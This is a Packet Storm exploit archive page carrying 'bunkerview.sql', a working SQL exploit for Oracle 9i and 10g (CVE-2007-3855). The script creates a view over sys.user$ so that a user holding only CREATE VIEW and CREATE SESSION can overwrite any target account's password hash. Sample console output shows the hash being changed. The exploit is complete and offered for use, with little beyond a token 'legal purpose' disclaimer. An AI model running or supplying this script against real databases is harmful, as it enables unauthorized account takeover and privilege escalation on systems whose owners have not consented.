exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bunkerview.txt

bunkerview.txt
Posted Jul 20, 2007
Authored by Andrea Purificato | Site rawlab.mindcreations.com

Oracle 9i and 10g evil view change password exploit.

tags | exploit
advisories | CVE-2007-3855
SHA-256 | 67a721e9a7e576c4b91c255ef53da472e4330cc3f959dc516deafe74bdaf2711

bunkerview.txt

Change Mirror Download
--
-- bunkerview.sql
--
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)
-- Uses evil view to perform unauthorized password update
--
-- by Andrea "bunker" Purificato - https://rawlab.mindcreations.com
-- 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
--
-- This code should be used only for LEGAL purpose!
-- ...and remember: use Oracle at your own risk ;-)
--
-- Thanks to security researchers all around the world...
-- Smarties rules (they know what I mean)! ;-D
--
--
-- SQL> select * from user_sys_privs;
--
-- USERNAME PRIVILEGE ADM
-- ------------------------------ ---------------------------------------- ---
-- TEST CREATE VIEW NO
-- TEST CREATE SESSION NO
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- AAAAAAAAAAAAAAAA
--
-- SQL> @bunkerview
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
-- [+] by Andrea "bunker" Purificato - https://rawlab.mindcreations.com
-- [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
--
-- Target username (default TEST):
--
-- View created.
--
-- old 1: update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user'
-- new 1: update bunkerview set password='6D9FEAAB597EF01B' where name='TEST'
--
-- 1 row updated.
--
--
-- View dropped.
--
--
-- Commit complete.
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- 6D9FEAAB597EF01B
--
set serveroutput on;
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
prompt [+] by Andrea "bunker" Purificato - https://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
prompt
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
create or replace view bunkerview as
select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;
update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user';
drop view bunkerview;
commit;
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close